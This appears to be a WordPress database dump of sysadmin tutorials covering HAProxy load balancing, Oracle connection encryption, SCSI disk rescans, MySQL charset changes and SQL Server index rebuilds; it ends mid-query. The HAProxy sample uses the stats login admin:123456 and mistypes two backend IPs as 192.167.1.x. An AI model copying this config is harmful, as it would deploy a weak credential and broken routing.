(107,2,'2020-02-13 18:07:24','2020-02-13 18:07:24','<!-- wp:paragraph -->\n<p>You have many options to install and configure a loadbalancer in RedHat 7. One of the best options is HAPorxy. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To setup HAProxy, you have to download related RPM file and then install it:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">rpm -ivh haproxy.rpm</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then, you have to make changes in config file (/etc/haproxy/haproxy.conf):</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>in this sample we have 4 servers as below:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>APP1: 192.168.1.2</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>APP2: 192.168.1.3</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>APP3: 192.168.1.4</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>LoadBalancer: 192.168.1.5</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">global\n log 127.0.0.1:514 local2 debug\n chroot /var/lib/haproxy\n pidfile /var/run/haproxy.pid\n maxconn 4000\n user haproxy\n group haproxy\n daemon\n maxconn 10000\n stats socket /var/lib/haproxy/stats\n tune.ssl.default-dh-param 2048\n \nlisten stats\n bind *:4331\n mode http\n log global\n maxconn 10\n timeout client 100s\n timeout server 100s\n timeout connect 100s\n timeout queue 100s\n stats refresh 30s\n stats enable\n stats uri /haproxy?stats\n stats realm HAProxy\\ Statistics\n stats auth admin:123456\n stats show-node\n\n \nfrontend public\n bind *:80 name clear\n redirect scheme https code 301 if !{ ssl_fc }\n bind *:443 ssl crt /etc/pki/tls/certs/app_test.pem\n mode http\n log 127.0.0.1:514 local3 debug\n log-format \"%ci:%cp [%tr] %ft %b/%s %TR/%Tw/%Tc/%Tr/%Ta %ST %B %CC %CS %tsc %ac/%fc/%bc/%sc/%rc %sq/%bq %hr %hs %{+Q}r\"\n http-request set-log-level debug\n option tcplog\n option httplog\n option dontlognull\n monitor-uri /monitoruri\n maxconn 8000\n timeout client 30s\n default_backend app_test\n\nbackend app_test\n mode http\n log 127.0.0.1:514 local4 debug\n option tcplog\n option httplog\n option dontlognull\n log-format \"%ci:%cp [%tr] %ft %b/%s %TR/%Tw/%Tc/%Tr/%Ta %ST %B %CC %CS %tsc %ac/%fc/%bc/%sc/%rc %sq/%bq %hr %hs %{+Q}r\"\n maxconn 10000\n balance roundrobin\n cookie SERVERID insert indirect nocache\n option prefer-last-server\n option forwardfor\n retries 2\n option redispatch\n timeout connect 50s\n timeout server 50s\n server s1 192.168.1.2:80 check cookie s1\n server s2 192.167.1.3:80 check cookie s2\n server s3 192.167.1.4:80 check cookie s3</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then you have to start the haproxy and make it autostart on reboots with these two commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">systemctl start haproxy.service\nsystemctl enable haproxy.service</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>you can see the statistics page with this url:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">http://192.168.1.5:4331/haproxy?stats</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>and your application can be accessed via the IP of this server.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Sometimes you encountered the following error:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">haproxy Starting proxy stats: cannot bind socket [0.0.0.0:4331]</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>In order to solve this error, you have to run this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">setsebool -P haproxy_connect_any=1</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>to see the system log:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">tail -f /var/log/haproxy.log</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>to see the access log:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code {\"highlightLines\":\"\"} -->\n<pre class=\"wp-block-syntaxhighlighter-code\">tail -f /var/log/haproxy-access-frontend.log</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>As you can see, you have to install rsyslog on your server, to do so, run these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">yum install -y rsyslog\nsystemctl enable rsyslogd\nsystemctl start rsyslog</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>After that, you should config rsyslog to gather HAProxy\'s logs. So you have to edit /etc/rsyslog.conf file and add these lines:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">local2.* /var/log/haproxy.log\nlocal3.* /var/log/haproxy-access-frontend.log\nlocal4.* /var/log/haproxy-access-backend.log</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that a new file in /etc/rsyslog.d/ should be created as below:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vi /etc/rsyslog.d/haproxy.conf</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">[root@s1vlmizbanlvs01 haproxy_reports]# cat /etc/rsyslog.d/haproxy.conf\n# Create an additional socket in haproxy\'s chroot in order to allow logging via\n# /dev/log to chroot\'ed HAProxy processes\n#$AddUnixListenSocket /var/lib/haproxy/dev/log\n\n# Send HAProxy messages to a dedicated logfile\n#if $programname startswith \'haproxy\' then /var/log/haproxy.log\n#&~\n$ModLoad imudp\n$UDPServerAddress 127.0.0.1\n$UDPServerRun 514\nlocal2.* /var/log/haproxy.log\nlocal3.* /var/log/haproxy-access-frontend.log\nlocal4.* /var/log/haproxy-access-backend.log\n</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>then, you have to restart the service:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">systemctl restart rsyslogd</pre>\n<!-- /wp:syntaxhighlighter/code -->','How to setup a loadbalancer with HAProxy in RedHat 7','','inherit','closed','closed','','104-revision-v1','','','2020-02-13 18:07:24','2020-02-13 18:07:24','',104,'http://ictbank.ir/blog/index.php/2020/02/13/104-revision-v1/',0,'revision','',0),
(110,2,'2020-02-25 19:10:30','2020-02-25 19:10:30','<!-- wp:paragraph -->\n<p>To encrypt connections between client and database server you have to set some parameters in sqlnet.ora file ($ORACLE_HOME/network/admin/sqlnet.ora) of server and client (you have to install oracle client on the client):</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>server side:</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">SQLNET.ENCRYPTION_SERVER=REQUIRED\nSQLNET.ENCRYPTION_TYPES_SERVER=(AES256)</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:list -->\n<ul><li> client side:</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">SQLNET.ENCRYPTION_CLIENT=REQUIRED\nSQLNET.ENCRYPTION_TYPES_CLIENT=(AES256)</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>the ENCRYPTION_CLIENT parameter can have one of these values:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>ACCEPTED : The client or server will allow both encrypted and non-encrypted connections. This is the default if the parameter is not set.</li><li>REJECTED : The client or server will refuse encrypted traffic.</li><li>REQUESTED : The client or server will request encrypted traffic if it is possible, but will accept non-encrypted traffic if encryption is not possible.</li><li>REQUIRED : The client or server will only accept encrypted traffic.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>the ENCRYPTION_TYPES_SERVER and ENCRYPTION_TYPES_CLIENT parameters can have these values:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>AES256: Advanced Encryption Standard (AES). AES was approved by the National Institute of Standards and Technology (NIST) to replace Data Encryption Standard (DES). AES256 enables you to encrypt a block size of 256 bits.</li><li>RC4_256: Rivest Cipher 4 (RC4), which is the most commonly used stream cipher that protects protocols such as Secure Sockets Layer (SSL). RC4_256 enables you to encrypt up to 256 bits of data.</li><li>AES192: Enables you to use AES to encrypt a block size of 192 bits.</li><li>3DES168: Triple Data Encryption Standard (TDES) with a three-key option. 3DES168 enables you to encrypt up to 168 bits of data.</li><li>AES128: Enables you to use AES to encrypt a block size of 128 bits.</li><li>RC4_128: Enables you to use RC4 to encrypt up to 128 bits of data.</li><li>3DES112: Enables you to use Triple DES with a two-key (112 bit) option.</li><li>DES: Data Encryption Standard (DES) 56-bit key. Note that National Institute of Standards and Technology (NIST) no longer recommends DES.</li><li>RC4_40: Enables you to use RC4 to encrypt up to 40 bits of data. (Not recommended.)</li><li>DES40: Enables you to use DES to encrypt up to 40 bits of data. (Not recommended.)</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --> ','Connection Encryption in Oracle Database','','publish','open','open','','connection-encryption-in-oracle-database','','','2020-03-26 00:52:03','2020-03-26 00:52:03','',0,'http://ictbank.ir/blog/?p=110',0,'post','',0),
(111,2,'2020-02-25 19:10:30','2020-02-25 19:10:30','<!-- wp:paragraph -->\n<p>To encrypt connections between client and database server you have to set some parameters in sqlnet.ora file ($ORACLE_HOME/network/admin/sqlnet.ora) of server and client (you have to install oracle client on the client):</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>server side:</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">SQLNET.ENCRYPTION_SERVER=REQUIRED\nSQLNET.ENCRYPTION_TYPES_SERVER=(AES256)</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:list -->\n<ul><li> client side:</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">SQLNET.ENCRYPTION_CLIENT=REQUIRED\nSQLNET.ENCRYPTION_TYPES_CLIENT=(AES256)</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>the ENCRYPTION_CLIENT parameter can have one of these values:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>ACCEPTED : The client or server will allow both encrypted and non-encrypted connections. This is the default if the parameter is not set.</li><li>REJECTED : The client or server will refuse encrypted traffic.</li><li>REQUESTED : The client or server will request encrypted traffic if it is possible, but will accept non-encrypted traffic if encryption is not possible.</li><li>REQUIRED : The client or server will only accept encrypted traffic.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>the ENCRYPTION_TYPES_SERVER and ENCRYPTION_TYPES_CLIENT parameters can have these values:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>AES256: Advanced Encryption Standard (AES). AES was approved by the National Institute of Standards and Technology (NIST) to replace Data Encryption Standard (DES). AES256 enables you to encrypt a block size of 256 bits.</li><li>RC4_256: Rivest Cipher 4 (RC4), which is the most commonly used stream cipher that protects protocols such as Secure Sockets Layer (SSL). RC4_256 enables you to encrypt up to 256 bits of data.</li><li>AES192: Enables you to use AES to encrypt a block size of 192 bits.</li><li>3DES168: Triple Data Encryption Standard (TDES) with a three-key option. 3DES168 enables you to encrypt up to 168 bits of data.</li><li>AES128: Enables you to use AES to encrypt a block size of 128 bits.</li><li>RC4_128: Enables you to use RC4 to encrypt up to 128 bits of data.</li><li>3DES112: Enables you to use Triple DES with a two-key (112 bit) option.</li><li>DES: Data Encryption Standard (DES) 56-bit key. Note that National Institute of Standards and Technology (NIST) no longer recommends DES.</li><li>RC4_40: Enables you to use RC4 to encrypt up to 40 bits of data. (Not recommended.)</li><li>DES40: Enables you to use DES to encrypt up to 40 bits of data. (Not recommended.)</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --> ','Connection Encryption in Oracle Database','','inherit','closed','closed','','110-revision-v1','','','2020-02-25 19:10:30','2020-02-25 19:10:30','',110,'http://ictbank.ir/blog/index.php/2020/02/25/110-revision-v1/',0,'revision','',0),
(135,2,'2020-03-23 16:54:40','2020-03-23 16:54:40','<!-- wp:paragraph -->\n<p>To encrypt connections between client and database server you have to set some parameters in sqlnet.ora file ($ORACLE_HOME/network/admin/sqlnet.ora) of server and client (you have to install oracle client on the client):</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>server side:</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">SQLNET.ENCRYPTION_SERVER=REQUIRED\nSQLNET.ENCRYPTION_TYPES_SERVER=(AES256)</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:list -->\n<ul><li> client side:</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">SQLNET.ENCRYPTION_CLIENT=REQUIRED\nSQLNET.ENCRYPTION_TYPES_CLIENT=(AES256)</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>the ENCRYPTION_CLIENT parameter can have one of these values:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>ACCEPTED : The client or server will allow both encrypted and non-encrypted connections. This is the default if the parameter is not set.</li><li>REJECTED : The client or server will refuse encrypted traffic.</li><li>REQUESTED : The client or server will request encrypted traffic if it is possible, but will accept non-encrypted traffic if encryption is not possible.</li><li>REQUIRED : The client or server will only accept encrypted traffic.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>the ENCRYPTION_TYPES_SERVER and ENCRYPTION_TYPES_CLIENT parameters can have these values:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>AES256: Advanced Encryption Standard (AES). AES was approved by the National Institute of Standards and Technology (NIST) to replace Data Encryption Standard (DES). AES256 enables you to encrypt a block size of 256 bits.</li><li>RC4_256: Rivest Cipher 4 (RC4), which is the most commonly used stream cipher that protects protocols such as Secure Sockets Layer (SSL). RC4_256 enables you to encrypt up to 256 bits of data.</li><li>AES192: Enables you to use AES to encrypt a block size of 192 bits.</li><li>3DES168: Triple Data Encryption Standard (TDES) with a three-key option. 3DES168 enables you to encrypt up to 168 bits of data.</li><li>AES128: Enables you to use AES to encrypt a block size of 128 bits.</li><li>RC4_128: Enables you to use RC4 to encrypt up to 128 bits of data.</li><li>3DES112: Enables you to use Triple DES with a two-key (112 bit) option.</li><li>DES: Data Encryption Standard (DES) 56-bit key. Note that National Institute of Standards and Technology (NIST) no longer recommends DES.</li><li>RC4_40: Enables you to use RC4 to encrypt up to 40 bits of data. (Not recommended.)</li><li>DES40: Enables you to use DES to encrypt up to 40 bits of data. (Not recommended.)</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --> ','Connection Encryption in Oracle Database','','inherit','closed','closed','','110-revision-v1','','','2020-03-23 16:54:40','2020-03-23 16:54:40','',110,'http://ictbank.ir/blog/index.php/2020/03/23/110-revision-v1/',0,'revision','',0),
(136,2,'2020-03-23 16:54:50','2020-03-23 16:54:50','<!-- wp:paragraph -->\n<p>You have many options to install and configure a loadbalancer in RedHat 7. One of the best options is HAPorxy. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To setup HAProxy, you have to download related RPM file and then install it:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">rpm -ivh haproxy.rpm</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then, you have to make changes in config file (/etc/haproxy/haproxy.conf):</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>in this sample we have 4 servers as below:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>APP1: 192.168.1.2</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>APP2: 192.168.1.3</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>APP3: 192.168.1.4</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>LoadBalancer: 192.168.1.5</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">global\n log 127.0.0.1:514 local2 debug\n chroot /var/lib/haproxy\n pidfile /var/run/haproxy.pid\n maxconn 4000\n user haproxy\n group haproxy\n daemon\n maxconn 10000\n stats socket /var/lib/haproxy/stats\n tune.ssl.default-dh-param 2048\n \nlisten stats\n bind *:4331\n mode http\n log global\n maxconn 10\n timeout client 100s\n timeout server 100s\n timeout connect 100s\n timeout queue 100s\n stats refresh 30s\n stats enable\n stats uri /haproxy?stats\n stats realm HAProxy\\ Statistics\n stats auth admin:123456\n stats show-node\n\n \nfrontend public\n bind *:80 name clear\n redirect scheme https code 301 if !{ ssl_fc }\n bind *:443 ssl crt /etc/pki/tls/certs/app_test.pem\n mode http\n log 127.0.0.1:514 local3 debug\n log-format \"%ci:%cp [%tr] %ft %b/%s %TR/%Tw/%Tc/%Tr/%Ta %ST %B %CC %CS %tsc %ac/%fc/%bc/%sc/%rc %sq/%bq %hr %hs %{+Q}r\"\n http-request set-log-level debug\n option tcplog\n option httplog\n option dontlognull\n monitor-uri /monitoruri\n maxconn 8000\n timeout client 30s\n default_backend app_test\n\nbackend app_test\n mode http\n log 127.0.0.1:514 local4 debug\n option tcplog\n option httplog\n option dontlognull\n log-format \"%ci:%cp [%tr] %ft %b/%s %TR/%Tw/%Tc/%Tr/%Ta %ST %B %CC %CS %tsc %ac/%fc/%bc/%sc/%rc %sq/%bq %hr %hs %{+Q}r\"\n maxconn 10000\n balance roundrobin\n cookie SERVERID insert indirect nocache\n option prefer-last-server\n option forwardfor\n retries 2\n option redispatch\n timeout connect 50s\n timeout server 50s\n server s1 192.168.1.2:80 check cookie s1\n server s2 192.167.1.3:80 check cookie s2\n server s3 192.167.1.4:80 check cookie s3</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then you have to start the haproxy and make it autostart on reboots with these two commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">systemctl start haproxy.service\nsystemctl enable haproxy.service</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>you can see the statistics page with this url:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">http://192.168.1.5:4331/haproxy?stats</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>and your application can be accessed via the IP of this server.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Sometimes you encountered the following error:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">haproxy Starting proxy stats: cannot bind socket [0.0.0.0:4331]</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>In order to solve this error, you have to run this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">setsebool -P haproxy_connect_any=1</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>to see the system log:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">tail -f /var/log/haproxy.log</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>to see the access log:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code {\"highlightLines\":\"\"} -->\n<pre class=\"wp-block-syntaxhighlighter-code\">tail -f /var/log/haproxy-access-frontend.log</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>As you can see, you have to install rsyslog on your server, to do so, run these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">yum install -y rsyslog\nsystemctl enable rsyslogd\nsystemctl start rsyslog</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>After that, you should config rsyslog to gather HAProxy\'s logs. So you have to edit /etc/rsyslog.conf file and add these lines:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">local2.* /var/log/haproxy.log\nlocal3.* /var/log/haproxy-access-frontend.log\nlocal4.* /var/log/haproxy-access-backend.log</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that a new file in /etc/rsyslog.d/ should be created as below:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vi /etc/rsyslog.d/haproxy.conf</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">[root@s1vlmizbanlvs01 haproxy_reports]# cat /etc/rsyslog.d/haproxy.conf\n# Create an additional socket in haproxy\'s chroot in order to allow logging via\n# /dev/log to chroot\'ed HAProxy processes\n#$AddUnixListenSocket /var/lib/haproxy/dev/log\n\n# Send HAProxy messages to a dedicated logfile\n#if $programname startswith \'haproxy\' then /var/log/haproxy.log\n#&~\n$ModLoad imudp\n$UDPServerAddress 127.0.0.1\n$UDPServerRun 514\nlocal2.* /var/log/haproxy.log\nlocal3.* /var/log/haproxy-access-frontend.log\nlocal4.* /var/log/haproxy-access-backend.log\n</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>then, you have to restart the service:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">systemctl restart rsyslogd</pre>\n<!-- /wp:syntaxhighlighter/code -->','How to setup a loadbalancer with HAProxy in RedHat 7','','inherit','closed','closed','','104-revision-v1','','','2020-03-23 16:54:50','2020-03-23 16:54:50','',104,'http://ictbank.ir/blog/index.php/2020/03/23/104-revision-v1/',0,'revision','',0),
(137,2,'2020-03-23 16:54:59','2020-03-23 16:54:59','<!-- wp:paragraph -->\n<p>If you add a new disk to your OS, you won\'t find this device in the device list (fdisk -l command). So you have two options to make it available:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li>Reboot your machine</li><li>Make the OS rescan all connected devices</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>In operational environments, the first option is not considerable. So we have to choose the second approach:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To do so you have to write \"- - -\" to /sys/class/scsi_host/host*/scan files:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">for filename in /sys/class/scsi_host/host*; do\n echo \"- - -\" > $filename/scan\ndone</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that you will find the new device in the fdisk -l command\'s results.</p>\n<!-- /wp:paragraph --> <p>If you add a new disk to your OS, you won\'t find this device in the device list (fdisk -l command). So you have two options to make it available:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li>Reboot your machine</li><li>Make the OS rescan all connected devices</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>In operational environments, the first option is not considerable. So we have to choose the second approach:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To do so you have to write \"- - -\" to /sys/class/scsi_host/host*/scan files:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">for filename in /sys/class/scsi_host/host*; do\n echo \"- - -\" > $filename/scan\ndone</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that you will find the new device in the fdisk -l command\'s results.</p>\n<!-- /wp:paragraph -->','Add New Disk to RedHat-based Linux without reboot','','inherit','closed','closed','','97-revision-v1','','','2020-03-23 16:54:59','2020-03-23 16:54:59','',97,'http://ictbank.ir/blog/index.php/2020/03/23/97-revision-v1/',0,'revision','',0),
(138,2,'2020-03-23 16:55:08','2020-03-23 16:55:08','<!-- wp:paragraph -->\n<p>To change the Character Set and Collation of a field of a table you have to use this query: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nALTER TABLE table_name MODIFY column_name data_type CHARACTER SET UTF8 COLLATE UTF8_UNICODE_CI;\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>if the table contains data, you have to update that data as follow: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nUPDATE table_name SET column_name= CONVERT(CAST(CONVERT(column_name USING LATIN1) AS BINARY) USING UTF8)\n<!-- /wp:syntaxhighlighter/code --> ','Change the Character Set & Collation of a table','','inherit','closed','closed','','68-revision-v1','','','2020-03-23 16:55:08','2020-03-23 16:55:08','',68,'http://ictbank.ir/blog/index.php/2020/03/23/68-revision-v1/',0,'revision','',0),
(139,2,'2020-03-23 16:55:18','2020-03-23 16:55:18','<!-- wp:paragraph -->\n<p>If you want to <strong>REBUILD</strong> and <strong>REORGANIZE </strong>all your indexes in a database, you have to use this query:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Rebuild:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nDECLARE @Loop int\nDECLARE @Loop2 int\nDECLARE @MaxLoop int\nDECLARE @MaxLoop2 int\nDECLARE @DBName varchar(300)\nDECLARE @SQL varchar(max)\n\nSET @Loop = 1\nSET @DBName = \'\'\n\nset nocount on\nSET @MaxLoop = (select count([name]) FROM sys.databases where [name] like \'%\')\nWHILE @Loop <= @MaxLoop\n BEGIN\n SET @DBName = (select TableWithRowsNumbers.name from (select ROW_NUMBER() OVER (ORDER by [name]) as Row,[name] FROM sys.databases where [name] like \'Z%\' ) TableWithRowsNumbers where Row = @Loop)\n SET @SQL = \'USE [\' + @DBName + \']\'\n print (@SQL)\n exec (@SQL)\n \n SET @Loop2 = 1\n\n SET @MaxLoop2 = (\n SELECT \n Count(indexstats.database_id) \n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n );\n WHILE @Loop2 <= @MaxLoop2\n begin\n set @SQL = \n (\n select xx.cmd from \n (\n SELECT \n ROW_NUMBER() OVER (ORDER by indexstats.avg_fragmentation_in_percent) as Row,\n indexstats.database_id ,\n dbschemas.[name] as \'Schema\',\n dbtables.[name] as \'Table\',\n dbindexes.[name] as \'Index\',\n indexstats.avg_fragmentation_in_percent,\n indexstats.page_count,\n \'alter index \' + dbindexes.[name] + \' on \' + dbschemas.[name] + \'.\' + dbtables.[name] + \' rebuild;\' as cmd\n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND 